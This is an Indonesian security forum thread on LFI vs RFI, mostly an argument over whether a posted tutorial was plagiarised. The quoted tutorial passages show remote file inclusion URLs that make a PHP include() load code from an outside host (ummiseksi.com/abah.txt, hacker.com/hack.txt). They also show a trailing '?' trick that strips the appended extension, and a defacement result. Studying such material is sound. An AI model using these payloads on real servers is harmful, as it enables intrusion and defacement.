Teori dasar LFI vs RFI
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Teori dasar LFI vs RFI
berhubung waktu ane menulis disini muncul kata yang ane kurang paham ya jadi ane upload aja silahkan di cicipi ya cuman tutorial bodoh dari ane. silahkan di lihat ya
[b]Ukhuwah Networking Group Indonesia[/b]
Alamat : Jalan Makmur Nomor 41 Kota Makassar Sulawesi Selatan
Home : 0411-454414 - 04112409679
[b]Hasbullah Masby[/b]
SMS : 087841085044
YM : [URL=ymsgr:sendIM?email.abah][img]http://www.software.ukhuwah.net/ym/online.gif[/img][/URL]
Alamat : Jalan Makmur Nomor 41 Kota Makassar Sulawesi Selatan
Home : 0411-454414 - 04112409679
[b]Hasbullah Masby[/b]
SMS : 087841085044
YM : [URL=ymsgr:sendIM?email.abah][img]http://www.software.ukhuwah.net/ym/online.gif[/img][/URL]
Re: Teori dasar LFI vs RFI
tambah koleksi kata mutiara by abah..
@atas..
perasaan dari kemaren ngebet banget ma Tembak IP.. mau buat nembak siapa pak?? cewek ya?? heuheuheuheu..
@atas..
perasaan dari kemaren ngebet banget ma Tembak IP.. mau buat nembak siapa pak?? cewek ya?? heuheuheuheu..
- xymcrush17
- Posts: 12
- Joined: Tue Nov 11, 2008 3:35 am
- Contact:
Re: Teori dasar LFI vs RFI
thank2 om. sharing nya.
@om shad pakabar?? lama gag ketemu neh..heheh
@om shad pakabar?? lama gag ketemu neh..heheh
Re: Teori dasar LFI vs RFI
@xmycrush..
wkwkwk.. pak kok menghilang dari peredaran?? kena garukan Satpol PP ya?? wkakakaka..
wkwkwk.. pak kok menghilang dari peredaran?? kena garukan Satpol PP ya?? wkakakaka..
Re: Teori dasar LFI vs RFI
abah.....cucu ijin dunlut file'a ya.....
buat simulasi di localhost bisa kan ya bah.....???
buat simulasi di localhost bisa kan ya bah.....???
Love And Peace cannot Created without "RESPECT"
Re: Teori dasar LFI vs RFI
bs dan di saranakn buat trik dulu di localhost baru di target pentesb0c4h wrote:abah.....cucu ijin dunlut file'a ya.....
buat simulasi di localhost bisa kan ya bah.....???
[b]Ukhuwah Networking Group Indonesia[/b]
Alamat : Jalan Makmur Nomor 41 Kota Makassar Sulawesi Selatan
Home : 0411-454414 - 04112409679
[b]Hasbullah Masby[/b]
SMS : 087841085044
YM : [URL=ymsgr:sendIM?email.abah][img]http://www.software.ukhuwah.net/ym/online.gif[/img][/URL]
Alamat : Jalan Makmur Nomor 41 Kota Makassar Sulawesi Selatan
Home : 0411-454414 - 04112409679
[b]Hasbullah Masby[/b]
SMS : 087841085044
YM : [URL=ymsgr:sendIM?email.abah][img]http://www.software.ukhuwah.net/ym/online.gif[/img][/URL]
Re: Teori dasar LFI vs RFI
bro abah, ini artikelnya bikinan abah sendiri bukan ya?? kok sembarangan main edit
1. http://jeky466.blogsome.com/2008/05/26/about-lfirfi/
2. http://www.jasakom.com/forum/viewtopic. ... 6&start=15
tuk temen2 yang lain, liat yg ini juga ya
http://xcode.or.id/forum2/viewtopic.php ... 30#p214139
maaf bro abah, bukan maksud saya mencari2 kesalahan sampeyan, tapi sayang sekali dua postingan tersebut saya pernah baca dan kenal betul siapa penulis/pembuat aslinya....peace bro
ini adalah cuplikan dari tutorial yang abah "buat"abah wrote:berhubung waktu ane menulis disini muncul kata yang ane kurang paham ya jadi ane upload aja silahkan di cicipi ya cuman tutorial bodoh dari ane. silahkan di lihat ya
bandingkan dengan inieksploitasi RFI
misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt
dan isi dari abah.txt adalah
maka page tadi akan menampilkan tulisan “HACKED BY KayLa”.
ini terjadi karena isi dari abah.txt dieksekusi oleh server.
.......
misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt
maka baris ketika code php kita , yaitu include akan menjadi
include(”./”.http://www.ummiseksi.com/abah.txt);
==> maka ./http://www.ummiseksi.com/abah.txt akan dianggap sebagai file dan server akan mencari file tersebut.
tentu saja akan error karena file ./http://www.ummiseksi.com/abah.txt tidak ada dalam server tersebut.
exploitasi RFI:
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt?
maka $page = $_GET[page] = http://www.ummiseksi.com/abah.txt?.php
nah .php oleh server akan diabaikan.
tuk link artikel yg asli (belum diedit, yg asli dari cupu-zone.com, tapi situs tersebut sudah gak ada sekarang)misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.hacker.com/hack.txt
maka baris ketika code php kita , yaitu include akan menjadi
include(”./”.http://www.hacker.com/hack.txt);
==> maka ./http://www.hacker.com/hack.txt akan dianggap sebagai file dan server akan mencari file tersebut.
tentu saja akan error karena file ./http://www.hacker.com/hack.txt tidak ada dalam server tersebut.
1. http://jeky466.blogsome.com/2008/05/26/about-lfirfi/
2. http://www.jasakom.com/forum/viewtopic. ... 6&start=15
tuk temen2 yang lain, liat yg ini juga ya
http://xcode.or.id/forum2/viewtopic.php ... 30#p214139
maaf bro abah, bukan maksud saya mencari2 kesalahan sampeyan, tapi sayang sekali dua postingan tersebut saya pernah baca dan kenal betul siapa penulis/pembuat aslinya....peace bro
aku masih seorang lamer
Re: Teori dasar LFI vs RFI
maksdunya anda apaarira wrote:bro abah, ini artikelnya bikinan abah sendiri bukan ya?? kok sembarangan main edit
ini adalah cuplikan dari tutorial yang abah "buat"abah wrote:berhubung waktu ane menulis disini muncul kata yang ane kurang paham ya jadi ane upload aja silahkan di cicipi ya cuman tutorial bodoh dari ane. silahkan di lihat yabandingkan dengan inieksploitasi RFI
misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt
dan isi dari abah.txt adalah
maka page tadi akan menampilkan tulisan “HACKED BY KayLa”.
ini terjadi karena isi dari abah.txt dieksekusi oleh server.
.......
misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt
maka baris ketika code php kita , yaitu include akan menjadi
include(”./”.http://www.ummiseksi.com/abah.txt);
==> maka ./http://www.ummiseksi.com/abah.txt akan dianggap sebagai file dan server akan mencari file tersebut.
tentu saja akan error karena file ./http://www.ummiseksi.com/abah.txt tidak ada dalam server tersebut.
exploitasi RFI:
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt?
maka $page = $_GET[page] = http://www.ummiseksi.com/abah.txt?.php
nah .php oleh server akan diabaikan.tuk link artikel yg asli (belum diedit, yg asli dari cupu-zone.com, tapi situs tersebut sudah gak ada sekarang)misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.hacker.com/hack.txt
maka baris ketika code php kita , yaitu include akan menjadi
include(”./”.http://www.hacker.com/hack.txt);
==> maka ./http://www.hacker.com/hack.txt akan dianggap sebagai file dan server akan mencari file tersebut.
tentu saja akan error karena file ./http://www.hacker.com/hack.txt tidak ada dalam server tersebut.
1. http://jeky466.blogsome.com/2008/05/26/about-lfirfi/
2. http://www.jasakom.com/forum/viewtopic. ... 6&start=15
tuk temen2 yang lain, liat yg ini juga ya
http://xcode.or.id/forum2/viewtopic.php ... 30#p214139
maaf bro abah, bukan maksud saya mencari2 kesalahan sampeyan, tapi sayang sekali dua postingan tersebut saya pernah baca dan kenal betul siapa penulis/pembuat aslinya....peace bro
apa emang penulis yang anda kenal emang bisa melakukan itu aja...sorry bro
OON gini bisa juga om kalau masalah gituan nggak usah di samakan dengan penulis aslina
mungkin om dan penulisna hebat dan mungkin pembuat tulisan itu tapi hargai ane yang bodoh yang pengen juga seperti anda yang hebat dan penulis yang anda kenal
btw thansk kritikanna master
[b]Ukhuwah Networking Group Indonesia[/b]
Alamat : Jalan Makmur Nomor 41 Kota Makassar Sulawesi Selatan
Home : 0411-454414 - 04112409679
[b]Hasbullah Masby[/b]
SMS : 087841085044
YM : [URL=ymsgr:sendIM?email.abah][img]http://www.software.ukhuwah.net/ym/online.gif[/img][/URL]
Alamat : Jalan Makmur Nomor 41 Kota Makassar Sulawesi Selatan
Home : 0411-454414 - 04112409679
[b]Hasbullah Masby[/b]
SMS : 087841085044
YM : [URL=ymsgr:sendIM?email.abah][img]http://www.software.ukhuwah.net/ym/online.gif[/img][/URL]